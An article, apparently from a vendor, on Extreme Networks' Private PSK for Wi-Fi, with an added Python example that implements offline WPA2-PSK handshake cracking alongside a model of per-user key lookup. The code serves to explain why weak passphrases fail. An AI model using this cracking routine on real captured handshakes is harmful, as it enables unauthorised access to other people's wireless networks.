Private PSK (Pre-Shared Key) - features and capabilities of the ExtremeCloud IQ platform

WPA3 has already been adopted and, since July 2020, has been mandatory for devices certified by the Wi-Fi Alliance, but WPA2 has not been withdrawn and is not going to be. Both WPA2 and WPA3 offer PSK (Personal) and Enterprise modes; in this article we look at Private PSK technology and the benefits it can deliver.

The weaknesses of WPA2-Personal have been known for a long time and, for the most part, have already been addressed (Protected Management Frames, patches for the KRACK vulnerability, and so on). The main remaining drawback of WPA2 with a PSK is that the PMK is derived from the passphrase and the SSID alone, so anyone who captures a 4-way handshake can test candidate passphrases offline, and weak passwords fall quickly to a dictionary attack. If the key is compromised and has to be changed, every connected device (and every access point) must be reconfigured, which can be very time-consuming. To mitigate the weak-password problem, the Wi-Fi Alliance recommends passphrases of at least 20 characters.

Another problem that WPA2-Personal sometimes cannot solve is assigning different profiles (VLAN, QoS, firewall policy, and so on) to groups of devices connected to the same SSID.

WPA2-Enterprise solves all of the problems described above, but at a price:

  • a PKI (Public Key Infrastructure) and certificates have to be available or deployed;
  • deployment can be complex;
  • troubleshooting can be complex;
  • it is not the best fit for IoT devices or guest access.

A more radical solution to the problems of WPA2-Personal is to move to WPA3, whose main improvement is replacing the PSK handshake with SAE (Simultaneous Authentication of Equals) while still relying on a static shared passphrase. WPA3-Personal solves the dictionary-attack problem, because a captured handshake no longer lets an attacker test passphrases offline, but it does not provide unique identification of the user during authentication and therefore cannot assign per-user profiles (everyone still shares the same static password).

It is also important to bear in mind that, at the time of writing, over 95% of existing clients do not support WPA3 and SAE, while WPA2 continues to work on the billions of devices already shipped.

To address the existing and potential problems described above, Extreme Networks developed Private Pre-Shared Key (PPSK) technology. PPSK works with any Wi-Fi client that supports WPA2-PSK and provides a level of security comparable to WPA2-Enterprise without the need to build an 802.1X/EAP infrastructure. Private PSK is essentially WPA2-PSK, but each user (or group of users) gets their own dynamically generated password. Managing PPSK is no harder than managing a single PSK, because the whole process is automated. The key database can be stored locally on the access points or in the cloud.

Keys can be generated automatically, with flexible control over their length and strength, validity period or expiration date, and the delivery method to the user (by e-mail or SMS):

You can also limit the number of clients that may connect with a single PPSK, or even configure MAC binding for connected devices. At the administrator's command any key can be revoked, and access to the network is denied for that key without reconfiguring any other device. If a client is connected at the moment its key is revoked, the access point disconnects it from the network automatically.

The main advantages of PPSK are:

  • ease of use combined with a high level of security;
  • dictionary attacks are defeated by long, strong keys that ExtremeCloud IQ generates and distributes automatically;
  • different security profiles can be assigned to different devices connected to the same SSID;
  • well suited to secure guest access;
  • well suited to secure access for devices that do not support 802.1X/EAP (handheld scanners, IoT and VoWiFi devices);
  • in production use and under continuous improvement for over 10 years.
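The following example is added here for illustration and is not code from the original article or from Extreme Networks. It shows, in Python, why the WPA2-PSK dictionary attack described earlier works (the PMK is PBKDF2-HMAC-SHA1 over the passphrase and SSID, so a captured message 2 of the 4-way handshake is enough to test candidates offline), why a long random per-user key of the kind PPSK distributes does not fall to a wordlist, and how an access point holding several keys for one SSID can tell users apart and enforce MAC binding and revocation by trying each active key against the handshake MIC. The SSID, MAC addresses, nonces, EAPOL body, wordlist and key database are all constructed for the example, and the per-key lookup is an assumed model of PPSK behaviour, not Extreme's implementation.

```python
"""Added example (not from the original article or Extreme Networks):
offline dictionary attack on a WPA2-PSK 4-way handshake, and the per-key
lookup that lets a PPSK access point tell users apart on one SSID."""
import hashlib
import hmac
import secrets
import string
from typing import Optional

SSID = b"corp-wifi"  # constructed SSID (assumption)


def pmk_from_passphrase(passphrase: str, ssid: bytes = SSID) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) concatenated for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < 64:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:64]


def kck_from_handshake(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Derive the PTK from PMK, both MAC addresses and both nonces; its first 16 bytes are the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_with_zeroed_mic: bytes) -> bytes:
    """WPA2/CCMP (AKM 00-0F-AC:2): MIC = HMAC-SHA1-128 over the EAPOL-Key frame with the MIC field zeroed."""
    return hmac.new(kck, eapol_with_zeroed_mic, hashlib.sha1).digest()[:16]


# Everything needed to test a candidate passphrase is visible in message 2 of the
# 4-way handshake: both MAC addresses, both nonces and the MIC.  Constructed values.
AP_MAC = bytes.fromhex("0002aa000001")
STA_MAC = bytes.fromhex("0002bb000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_M2 = bytes.fromhex("0103005f02010a") + b"\x00" * 24  # toy EAPOL-Key body, MIC zeroed


def make_capture(passphrase: str, sta_mac: bytes = STA_MAC) -> dict:
    """Simulate a client that knows `passphrase` sending message 2 (constructed capture)."""
    kck = kck_from_handshake(pmk_from_passphrase(passphrase), AP_MAC, sta_mac, ANONCE, SNONCE)
    return {"aa": AP_MAC, "spa": sta_mac, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": EAPOL_M2, "mic": eapol_mic(kck, EAPOL_M2)}


def mic_matches(cap: dict, passphrase: str) -> bool:
    """True if `passphrase` reproduces the MIC in the captured message 2."""
    kck = kck_from_handshake(pmk_from_passphrase(passphrase),
                             cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])
    return hmac.compare_digest(eapol_mic(kck, cap["eapol"]), cap["mic"])


def dictionary_attack(cap: dict, wordlist) -> Optional[str]:
    """Attacker side: test each candidate offline; the network is never contacted again."""
    for candidate in wordlist:
        if mic_matches(cap, candidate):
            return candidate
    return None


def generate_ppsk(length: int = 24) -> str:
    """Random per-user key of the kind PPSK hands out; not something a wordlist will contain."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def identify_ppsk_user(cap: dict, keydb: dict) -> Optional[str]:
    """AP side (assumed PPSK model, not Extreme's code): try every non-revoked key for the SSID,
    identify the user by which key validates the MIC, then enforce that key's MAC binding."""
    for user, rec in keydb.items():
        if rec.get("revoked") or not mic_matches(cap, rec["key"]):
            continue
        if rec.get("mac") is not None and rec["mac"] != cap["spa"]:
            return None  # right key, wrong device: MAC binding rejects it
        return user
    return None


if __name__ == "__main__":
    wordlist = ["123456", "qwerty", "password", "letmein", "password123"]  # constructed
    print("weak PSK recovered:", dictionary_attack(make_capture("password123"), wordlist))
    print("random PPSK recovered:", dictionary_attack(make_capture(generate_ppsk()), wordlist))
```

The attacker and the access point run the same computation; the difference is only what they iterate over. The attacker iterates a wordlist, which is why a short human-chosen PSK is lost the moment one handshake is captured, while a 24-character random key is out of reach. The access point iterates its own key database, which is what lets one SSID carry a distinct key, profile and MAC binding per user and lets revocation take effect for one key without touching the others.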

If you have any questions, you can always contact the staff of our office: [email protected].

Source: habr.com